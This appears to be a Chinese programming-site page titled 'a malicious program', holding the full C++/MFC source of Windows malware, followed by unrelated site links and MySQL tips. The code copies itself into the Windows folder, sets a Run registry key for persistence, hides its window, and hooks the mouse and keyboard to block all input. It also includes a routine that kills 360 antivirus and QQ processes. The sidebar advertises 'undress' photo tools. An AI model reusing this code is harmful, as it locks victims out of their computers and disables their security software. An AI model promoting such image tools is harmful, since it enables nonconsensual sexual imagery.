一个恶意程序
microsoft
r
run
software
windows
惡意
程式
<span //</span><span KeyBoardHookDialogDlg.cpp : implementation file
</span><span //
</span><span
#include </span><span "</span><span stdafx.h</span><span "</span><span
#include </span><span "</span><span KeyBoardHookDialog.h</span><span "</span><span
#include </span><span "</span><span KeyBoardHookDialogDlg.h</span><span "</span>
<span #define</span> REG_RUN "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"<span
#include </span><tlhelp32.h><span
#ifdef _DEBUG
</span><span #define</span> new DEBUG_NEW
<span #undef</span> THIS_FILE
<span static</span> <span char</span> THIS_FILE[] =<span __FILE__;
</span><span #endif</span>
<span //</span><span #pragma comment (lib,"KeyBoardHook")</span>
<span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span CAboutDlg dialog used for App About
</span><span //</span><span 定义全局HHOOK变量,用于保存</span>
<span HHOOK g_hMouse;
HHOOK g_hKeyboard;
</span><span bool</span> isTrue = <span false</span><span ;
HWND hWnd; </span><span //</span><span 保存当前句柄
</span><span //</span><span 注意以下俩个钩子过程是全局函数,所以里面的API要用全局的</span>
<span LRESULT CALLBACK MouseProc(
</span><span int</span> nCode, <span //</span><span hook code</span>
WPARAM wParam, <span //</span><span message identifier</span>
LPARAM lParam <span //</span><span mouse coordinates</span>
<span )
{
</span><span return</span> <span 1</span><span ;
}
LRESULT CALLBACK KeyboardProc(
</span><span int</span> code, <span //</span><span hook code</span>
WPARAM wParam, <span //</span><span virtual-key code</span>
LPARAM lParam <span //</span><span keystroke-message information</span>
<span )
{
</span><span //</span><span if(VK_SPACE == wParam || VK_RETURN == wParam) </span><span //</span><span 屏蔽空格和回车键</span>
<span /*</span><span if(VK_F4 == wParam && (lParam>>29 & 1)) //屏蔽ALT + F4键
return 1;
else
return CallNextHookEx(g_hKeyboard,code,wParam,lParam);</span><span */</span>
<span //</span><span 留个后门,使当按下F2键时,程序将退</span>
<span if</span>(VK_F2 ==<span wParam)
{
</span><span //</span><span 调用全局API函数向程序发出关闭消息</span>
::SendMessage(hWnd,WM_CLOSE,<span 0</span>,<span 0</span><span );
</span><span //</span><span 卸载钩子</span>
<span UnhookWindowsHookEx(g_hMouse);
UnhookWindowsHookEx(g_hKeyboard);
}
</span><span return</span> <span 1</span><span ;
}
</span><span class</span> CAboutDlg : <span public</span><span CDialog
{
</span><span public</span><span :
CAboutDlg();
</span><span //</span><span Dialog Data
</span><span //</span><span {{AFX_DATA(CAboutDlg)</span>
<span enum</span> { IDD =<span IDD_ABOUTBOX };
</span><span //</span><span }}AFX_DATA
</span><span //</span><span ClassWizard generated virtual function overridesf
</span><span //</span><span {{AFX_VIRTUAL(CAboutDlg)</span>
<span protected</span><span :
</span><span virtual</span> <span void</span> DoDataExchange(CDataExchange* pDX); <span //</span><span DDX/DDV support
</span><span //</span><span }}AFX_VIRTUAL
</span><span //</span><span Implementation</span>
<span protected</span><span :
</span><span //</span><span {{AFX_MSG(CAboutDlg)
</span><span //</span><span }}AFX_MSG</span>
<span DECLARE_MESSAGE_MAP()
};
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
</span><span //</span><span {{AFX_DATA_INIT(CAboutDlg)
</span><span //</span><span }}AFX_DATA_INIT</span>
<span }
</span><span void</span> CAboutDlg::DoDataExchange(CDataExchange*<span pDX)
{
CDialog::DoDataExchange(pDX);
</span><span //</span><span {{AFX_DATA_MAP(CAboutDlg)
</span><span //</span><span }}AFX_DATA_MAP</span>
<span }
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
</span><span //</span><span {{AFX_MSG_MAP(CAboutDlg)
</span><span //</span><span No message handlers
</span><span //</span><span }}AFX_MSG_MAP</span>
<span END_MESSAGE_MAP()
</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span CKeyBoardHookDialogDlg dialog</span>
<span
CKeyBoardHookDialogDlg::CKeyBoardHookDialogDlg(CWnd</span>* pParent <span /*</span><span =NULL</span><span */</span><span )
: CDialog(CKeyBoardHookDialogDlg::IDD, pParent)
{
</span><span //</span><span {{AFX_DATA_INIT(CKeyBoardHookDialogDlg)
</span><span //</span><span NOTE: the ClassWizard will add member initialization here
</span><span //</span><span }}AFX_DATA_INIT
</span><span //</span><span Note that LoadIcon does not require a subsequent DestroyIcon in Win32</span>
m_hIcon = AfxGetApp()-><span LoadIcon(IDR_MAINFRAME);
}
</span><span void</span> CKeyBoardHookDialogDlg::DoDataExchange(CDataExchange*<span pDX)
{
CDialog::DoDataExchange(pDX);
</span><span //</span><span {{AFX_DATA_MAP(CKeyBoardHookDialogDlg)
</span><span //</span><span NOTE: the ClassWizard will add DDX and DDV calls here
</span><span //</span><span }}AFX_DATA_MAP</span>
<span }
BEGIN_MESSAGE_MAP(CKeyBoardHookDialogDlg, CDialog)
</span><span //</span><span {{AFX_MSG_MAP(CKeyBoardHookDialogDlg)</span>
<span ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
ON_BN_CLICKED(IDC_BTN_HOOKON, OnBtnHookon)
ON_WM_TIMER()
</span><span //</span><span }}AFX_MSG_MAP</span>
<span END_MESSAGE_MAP()
</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span CKeyBoardHookDialogDlg message handlers</span>
<span
BOOL CKeyBoardHookDialogDlg::OnInitDialog()
{
CDialog::OnInitDialog();
</span><span //</span><span Add "About..." menu item to system menu.
</span><span //</span><span IDM_ABOUTBOX must be in the system command range.</span>
ASSERT((IDM_ABOUTBOX & <span 0xFFF0</span>) ==<span IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX </span>< <span 0xF000</span><span );
CMenu</span>* pSysMenu =<span GetSystemMenu(FALSE);
</span><span if</span> (pSysMenu !=<span NULL)
{
CString strAboutMenu;
strAboutMenu.LoadString(IDS_ABOUTBOX);
</span><span if</span> (!<span strAboutMenu.IsEmpty())
{
pSysMenu</span>-><span AppendMenu(MF_SEPARATOR);
pSysMenu</span>-><span AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
</span><span //</span><span Set the icon for this dialog. The framework does this automatically
</span><span //</span><span when the application's main window is not a dialog</span>
SetIcon(m_hIcon, TRUE); <span //</span><span Set big icon</span>
SetIcon(m_hIcon, FALSE); <span //</span><span Set small icon
</span><span //</span><span TODO: Add extra initialization here</span>
<span
CopySelf();
autoRun();</span><span //</span><span 注册表启动
</span><span //</span><span 设定钩子
</span><span //</span><span ShowProcess();</span>
g_hMouse =<span SetWindowsHookEx(WH_MOUSE,MouseProc,NULL,GetCurrentThreadId());
g_hKeyboard </span>=<span SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,NULL,GetCurrentThreadId());
</span><span //</span><span 保存句柄</span>
hWnd =<span m_hWnd;
SetTimer(</span><span 1</span>, <span 2000</span><span , NULL);
isTrue </span>= <span true</span><span ;
</span><span return</span> TRUE; <span //</span><span return TRUE unless you set the focus to a control</span>
<span }
</span><span void</span><span CKeyBoardHookDialogDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
</span><span if</span> ((nID & <span 0xFFF0</span>) ==<span IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
</span><span else</span><span
{
CDialog::OnSysCommand(nID, lParam);
}
}
</span><span //</span><span If you add a minimize button to your dialog, you will need the code below
</span><span //</span><span to draw the icon. For MFC applications using the document/view model,
</span><span //</span><span this is automatically done for you by the framework.</span>
<span void</span><span CKeyBoardHookDialogDlg::OnPaint()
{
</span><span if</span><span (IsIconic())
{
CPaintDC dc(</span><span this</span>); <span //</span><span device context for painting</span>
<span
SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), </span><span 0</span><span );
</span><span //</span><span Center icon in client rectangle</span>
<span int</span> cxIcon =<span GetSystemMetrics(SM_CXICON);
</span><span int</span> cyIcon =<span GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(</span>&<span rect);
</span><span int</span> x = (rect.Width() - cxIcon + <span 1</span>) / <span 2</span><span ;
</span><span int</span> y = (rect.Height() - cyIcon + <span 1</span>) / <span 2</span><span ;
</span><span //</span><span Draw the icon</span>
<span dc.DrawIcon(x, y, m_hIcon);
}
</span><span else</span><span
{
CDialog::OnPaint();
}
}
</span><span //</span><span The system calls this to obtain the cursor to display while the user drags
</span><span //</span><span the minimized window.</span>
<span HCURSOR CKeyBoardHookDialogDlg::OnQueryDragIcon()
{
</span><span return</span><span (HCURSOR) m_hIcon;
}
</span><span void</span><span CKeyBoardHookDialogDlg::OnBtnHookon()
{
</span><span //</span><span TODO: Add your control notification handler code here</span>
<span
}
</span><span //</span><span DEL void CKeyBoardHookDialogDlg::OnBtnHookoff()
</span><span //</span><span DEL {
</span><span //</span><span DEL </span><span //</span><span TODO: Add your control notification handler code here
</span><span //</span><span DEL SetHookOff();
</span><span //</span><span DEL
</span><span //</span><span DEL }</span>
<span void</span><span CKeyBoardHookDialogDlg::hide()
{
ShowWindow(SW_HIDE);
}
</span><span void</span><span CKeyBoardHookDialogDlg::autoRun()
{
HKEY hKey </span>=<span NULL;
LONG lRet </span>= RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&<span hKey);
</span><span if</span>(lRet !=<span ERROR_SUCCESS)
{
</span><span return</span><span ;
}
RegSetValueEx(hKey,</span><span "</span><span mynona</span><span "</span>,NULL,REG_SZ,(<span const</span> unsigned <span char</span> *)&<span szWindowsPath,
strlen(szWindowsPath) </span>+<span sizeof</span>(<span char</span><span ));
RegCloseKey(hKey);
}
</span><span void</span><span CKeyBoardHookDialogDlg::ShowProcess()
{
HANDLE hSnap </span>=<span CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
</span><span //</span><span ...</span>
<span
PROCESSENTRY32 Pe32 </span>= {<span 0</span><span };
Pe32.dwSize </span>= <span sizeof</span><span (PROCESSENTRY32);
</span><span int</span> bRet = Process32First(hSnap,&<span Pe32);
</span><span //</span><span 360IOSMgrSrv 360tray </span>
<span char</span> name[MAX_PATH] = <span "</span><span QQ.exe</span><span "</span><span ;
</span><span char</span> name2[MAX_PATH] = <span "</span><span 360tray.exe</span><span "</span><span ;
</span><span char</span> name3[MAX_PATH] = <span "</span><span 360rp.exe</span><span "</span><span ;
</span><span while</span><span (bRet)
{
</span><span //</span><span ...</span>
bRet = Process32Next(hSnap,&<span Pe32);
</span><span //</span><span cout<<"id:"<<Pe32.th32ProcessID<<" name:"<<Pe32.szExeFile<<endl;</span>
<span int</span> flag = <span 0</span><span ;
</span><span if</span>(strcmp(Pe32.szExeFile,name) == <span 0</span> || strcmp(Pe32.szExeFile,name3) == <span 0</span> || strcmp(Pe32.szExeFile,name2) ==<span 0</span><span )
flag </span>= <span 1</span><span ;
</span><span if</span><span (flag){
</span><span //</span><span cout<<"----------------------"<<Pe32.th32ProcessID<<endl;</span>
<span MessageBox(Pe32.szExeFile);
HANDLE hProcess </span>=<span OpenProcess(PROCESS_TERMINATE,FALSE,Pe32.th32ProcessID);
LPDWORD lpExitCode </span>= <span 0</span><span ;
GetExitCodeProcess(hProcess, lpExitCode);
TerminateProcess(hProcess, (UINT)lpExitCode);
}
}
}
</span><span void</span><span CKeyBoardHookDialogDlg::CopySelf()
{
</span><span char</span> szSelfName[MAX_PATH] = {<span 0</span><span };
</span><span //</span><span char szSystemPath[MAX_PATH] = {0};</span>
<span char</span> szTmpPath[MAX_PATH] = {<span 0</span><span };
</span><span //</span><span 获取当前程序自身路径</span>
<span GetModuleFileName(NULL,szSelfName,MAX_PATH);
</span><span //</span><span cout<<"szSelfName:"<<szSelfName<<endl;
</span><span //</span><span 获取系统目录</span>
<span GetWindowsDirectory(szWindowsPath,MAX_PATH);
</span><span //</span><span cout<<"szWindowsPath:"<<szWindowsPath<<endl;
</span><span //</span><span 获取windows目录
</span><span //</span><span GetSystemDirectory(szSystemPath,MAX_PATH);
</span><span //</span><span cout<<"szSystemPath:"<<szSystemPath<<endl;</span>
<span
strcat(szWindowsPath,</span><span "</span><span \\mynona.exe</span><span "</span><span );
</span><span //</span><span strcat(szSystemPath,"\\mynona.exe");</span>
<span
MessageBox( szWindowsPath,</span><span "</span><span : szWindowsPath</span><span "</span><span );
</span><span //</span><span MessageBox( szSystemPath,": szSystemPath"); </span>
<span int</span> isTrue = CopyFile(szSelfName,szWindowsPath,FALSE);<span //</span><span FALSE表示强行覆盖原有文件
</span><span //</span><span int isTrue2 = CopyFile(szSelfName,szSystemPath,FALSE);</span>
<span
}
</span><span void</span><span CKeyBoardHookDialogDlg::OnTimer(UINT nIDEvent)
{
</span><span //</span><span TODO: Add your message handler code here and/or call default</span>
<span if</span><span (isTrue){
ShowWindow(SW_HIDE);
}
MessageBox(</span><span "</span><span haha</span><span "</span>,<span "</span><span 哈哈</span><span "</span><span ,MB_ICONSTOP);
CDialog::OnTimer(nIDEvent);
}</span>登入後複製
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱AI工具
Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片
AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。
Undress AI Tool
免費脫衣圖片
Clothoff.io
AI脫衣器
Video Face Swap
使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!
熱門文章
Windows 11 KB5054979中的新功能以及如何解決更新問題
3 週前
By DDD
如何修復KB5055523無法在Windows 11中安裝?
2 週前
By DDD
Inzoi:如何申請學校和大學
3 週前
By DDD
如何修復KB5055518無法在Windows 10中安裝?
2 週前
By DDD
Roblox:Dead Rails - 如何召喚和擊敗Nikola Tesla
4 週前
By 尊渡假赌尊渡假赌尊渡假赌
熱工具
記事本++7.3.1
好用且免費的程式碼編輯器
SublimeText3漢化版
中文版,非常好用
禪工作室 13.0.1
強大的PHP整合開發環境
Dreamweaver CS6
視覺化網頁開發工具
SublimeText3 Mac版
神級程式碼編輯軟體(SublimeText3)
可以在 Windows 7 上安裝 mysql 嗎
Apr 08, 2025 pm 03:21 PM
是的,可以在 Windows 7 上安裝 MySQL,雖然微軟已停止支持 Windows 7,但 MySQL 仍兼容它。不過,安裝過程中需要注意以下幾點:下載適用於 Windows 的 MySQL 安裝程序。選擇合適的 MySQL 版本(社區版或企業版)。安裝過程中選擇適當的安裝目錄和字符集。設置 root 用戶密碼,並妥善保管。連接數據庫進行測試。注意 Windows 7 上的兼容性問題和安全性問題,建議升級到受支持的操作系統。
mysql 無法連接到本地主機怎麼解決
Apr 08, 2025 pm 02:24 PM
無法連接 MySQL 可能是由於以下原因:MySQL 服務未啟動、防火牆攔截連接、端口號錯誤、用戶名或密碼錯誤、my.cnf 中的監聽地址配置不當等。排查步驟包括:1. 檢查 MySQL 服務是否正在運行;2. 調整防火牆設置以允許 MySQL 監聽 3306 端口;3. 確認端口號與實際端口號一致;4. 檢查用戶名和密碼是否正確;5. 確保 my.cnf 中的 bind-address 設置正確。
mySQL下載完安裝不了
Apr 08, 2025 am 11:24 AM
MySQL安裝失敗的原因主要有:1.權限問題,需以管理員身份運行或使用sudo命令;2.依賴項缺失,需安裝相關開發包;3.端口衝突,需關閉佔用3306端口的程序或修改配置文件;4.安裝包損壞,需重新下載並驗證完整性;5.環境變量配置錯誤,需根據操作系統正確配置環境變量。解決這些問題,仔細檢查每個步驟,就能順利安裝MySQL。
MySQL安裝在特定係統版本上報錯的解決途徑
Apr 08, 2025 am 11:54 AM
MySQL安裝報錯的解決方法是:1.仔細檢查系統環境,確保滿足MySQL的依賴庫要求,不同操作系統和版本需求不同;2.認真閱讀報錯信息,根據提示(例如缺少庫文件或權限不足)採取對應措施,例如安裝依賴或使用sudo命令;3.必要時,可嘗試源碼安裝並仔細檢查編譯日誌,但這需要一定的Linux知識和經驗。最終解決問題的關鍵在於仔細檢查系統環境和報錯信息,並參考官方文檔。
無法從終端訪問 mysql
Apr 08, 2025 pm 04:57 PM
無法從終端訪問 MySQL 可能是由於:MySQL 服務未運行;連接命令錯誤;權限不足;防火牆阻止連接;MySQL 配置文件錯誤。
mysql怎麼複製粘貼
Apr 08, 2025 pm 07:18 PM
MySQL 中的複制粘貼包含以下步驟:選擇數據,使用 Ctrl C(Windows)或 Cmd C(Mac)複製;在目標位置右鍵單擊,選擇“粘貼”或使用 Ctrl V(Windows)或 Cmd V(Mac);複製的數據將插入到目標位置,或替換現有數據(取決於目標位置是否已存在數據)。
vs code 可以在 Windows 8 中運行嗎
Apr 15, 2025 pm 07:24 PM
VS Code可以在Windows 8上運行,但體驗可能不佳。首先確保系統已更新到最新補丁,然後下載與系統架構匹配的VS Code安裝包,按照提示安裝。安裝後,注意某些擴展程序可能與Windows 8不兼容,需要尋找替代擴展或在虛擬機中使用更新的Windows系統。安裝必要的擴展,檢查是否正常工作。儘管VS Code在Windows 8上可行,但建議升級到更新的Windows系統以獲得更好的開發體驗和安全保障。
MySQL安裝後服務無法啟動的解決辦法
Apr 08, 2025 am 11:18 AM
MySQL拒啟動?別慌,咱來排查!很多朋友安裝完MySQL後,發現服務死活啟動不了,心裡那個急啊!別急,這篇文章帶你從容應對,揪出幕後黑手!讀完後,你不僅能解決這個問題,還能提升對MySQL服務的理解,以及排查問題的思路,成為一名更強大的數據庫管理員! MySQL服務啟動失敗,原因五花八門,從簡單的配置錯誤到復雜的系統問題都有可能。咱們先從最常見的幾個方面入手。基礎知識:服務啟動流程簡述MySQL服務啟動,簡單來說,就是操作系統加載MySQL相關的文件,然後啟動MySQL守護進程。這其中涉及到配置
